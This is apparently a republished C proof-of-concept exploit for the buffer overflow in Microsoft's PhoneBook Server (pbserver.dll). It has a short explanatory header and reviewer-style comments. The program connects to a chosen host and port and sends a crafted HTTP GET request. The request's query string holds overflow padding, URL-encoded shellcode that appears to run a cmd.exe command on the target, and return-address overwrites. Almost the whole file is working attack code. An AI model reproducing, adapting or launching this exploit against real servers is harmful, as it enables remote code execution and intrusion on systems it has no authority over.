Microsoft Phonebook Server Remote Exploit - Tests for the pbserver.dll buffer overflow.
03ee0782ae94986d7ad6091fa2a68ecd086f76e481828a70e1bbf11319bdf425
/* A vulnerability in the PhoneBook service (a Windows NT and Windows 2000 add-on component) enables attackers to execute
arbitrary code on Windows servers. We already discussed this security hole and its possible solution in detail in our
previous post: Vulnerability found in Microsoft PhoneBook Server (Patch available). Exploit code has now been
released that serves as a proof of concept for this security vulnerability. */
#include <windows.h>
#include <winsock.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Target address: family/address filled in by startWSOCK(), port by CheckWeb(). */
struct sockaddr_in sa = {0};
/* gethostbyname() result for the host named on the command line. */
struct hostent *he = NULL;
/* Client socket opened and closed inside CheckWeb(). */
SOCKET sock = 0;
/* Bounded copy of argv[1], made by main(). */
char hostname[256] = {0};
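/*
 * Entry point: `argv[1]` is the host to resolve, `argv[2]` the TCP port.
 * Copies the host into the file-scope `hostname` buffer, initialises Winsock
 * through startWSOCK(), runs CheckWeb() on the parsed port and releases
 * Winsock again. Returns 0 on every path, as the original did; errors are
 * reported on stdout only.
 */
int main(int argc, char *argv[])
{
    /* Block-scope prototypes: both helpers are defined later in this file,
     * so without these the calls below rely on implicit declarations. */
    int startWSOCK(char *swhost);
    int CheckWeb(int port);
    int chk = 0;
    long port = 0;
    char *end = NULL;

    if (argc != 3)
    {
        printf("Usage: c:\\>%s host port\nTests for the pbserver.dll buffer overrun in IIS\nDavid Litchfield (dlitchfield@atstake.com)", argv[0]);
        return 0;
    }
    /* snprintf() always NUL-terminates within sizeof hostname, unlike strncpy(). */
    snprintf(hostname, sizeof hostname, "%s", argv[1]);

    /* strtol() with range checking instead of atoi(), which cannot report
     * non-numeric input or values outside the 16-bit port range. */
    errno = 0;
    port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE || port < 0 || port > 65535)
    {
        printf("Invalid port: %s\n", argv[2]);
        return 0;
    }

    chk = startWSOCK(hostname);
    if (chk != 0)
    {
        /* startWSOCK() has already released Winsock on its failure paths. */
        printf("Winsock error");
        return 0;
    }
    CheckWeb((int)port);
    WSACleanup();   /* balance the WSAStartup() done in startWSOCK() */
    return 0;
}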
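/*
 * Initialise Winsock 2.0 and resolve `swhost` into the file-scope `sa`.
 * On success `he` holds the gethostbyname() result and `sa.sin_family` /
 * `sa.sin_addr` are set; `sa.sin_port` is left for the caller to fill in.
 * Returns 0 on success, 2 if WSAStartup() fails, 3 if the negotiated
 * version is not 2.0, and 4 if the name does not resolve to exactly one
 * IPv4 address. Winsock is released again on every failure path reached
 * after WSAStartup() succeeded, so a non-zero return leaves nothing for
 * the caller to clean up.
 */
int startWSOCK(char *swhost)
{
    WORD wVersionRequested = MAKEWORD(2, 0);
    WSADATA wsaData;
    int err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0)
    {
        return 2;
    }
    if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
    {
        WSACleanup();
        return 3;
    }
    he = gethostbyname(swhost);
    /* h_length drives the copy below, so anything other than an IPv4 address
     * of exactly sizeof sa.sin_addr bytes would over- or under-fill sin_addr. */
    if (he == NULL || he->h_addrtype != AF_INET || he->h_addr == NULL
        || (size_t)he->h_length != sizeof sa.sin_addr)
    {
        WSACleanup();   /* previously leaked: WSAStartup() had already succeeded */
        return 4;
    }
    /* The earlier INADDR_ANY assignment was a dead store overwritten by this copy. */
    sa.sin_family = AF_INET;
    memcpy(&sa.sin_addr, he->h_addr, sizeof sa.sin_addr);
    return 0;
}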
/*
 * Connect to the address resolved into `sa` by startWSOCK() on `port`,
 * send the fixed HTTP request held in `buffer` once, and close the socket.
 * @param port TCP port in host byte order; converted with htons() below.
 * @return 0 on every path, so the caller cannot distinguish a failed
 *         socket()/connect() from a completed send().
 */
int CheckWeb(int port)
{
/* Only `snd` is used in this function; rcv, err, count and incount are dead locals. */
int snd, rcv, err, count =0,incount = 0;
/* the following line may wrap */
/*
 * Request sent to the target. The oversized query-string values are the
 * proof-of-concept overflow input referred to in the file header; the Host
 * header is hard-coded to 127.0.0.1 regardless of the real target.
 */
char *buffer="GET /pbserver/pbserver.dll?OSArch=0&OSType=2&LCID=\
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\
&OSVer=%55%8B%EC%90%90%90%90%90%bb%ff%ff%ff%ff%83\
%eb%8b%53%68%6e%2e%74%78%68%76%6f%72%75%68%20\
%70%73%72%68%69%72%20%3e%68%2f%63%20%64%90%90\
&CMVer=%68%65%78%65%20%68%63%6d%64%2e\
%B8%86%a9%f1%77%8b%dc%33%f6%56%53%ff%d0%90%90\
DDDDDDDDDDDDDDDDDDD&PBVer=&0PB=\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAA%4c%55%93%5e%cc%ccAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAA%e4%51%93%5ennnn HTTP/1.1\r\n\
Host: 127.0.0.1\r\n\r\n";
sa.sin_port=htons(port);
sock=socket(AF_INET,SOCK_STREAM,0);
/* NOTE(review): bind() runs before `sock` is validated and is given the
 * remote address/port held in `sa`; its return value is ignored, so the call
 * presumably has no effect on the connection that follows -- confirm. */
bind(sock,(struct sockaddr *)&sa,sizeof(sa));
if (sock==INVALID_SOCKET)
{
closesocket(sock);
return 0;
}
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
{
closesocket(sock);
printf("Failed to connect\n");
return 0;
}
else
{
/* The send() result stored in `snd` is never checked; "Buffer sent." is
 * printed even if send() reported an error or a short write. */
snd = send(sock,buffer,strlen(buffer),0);
printf("Buffer sent.\n");
}
closesocket(sock);
return 0;
}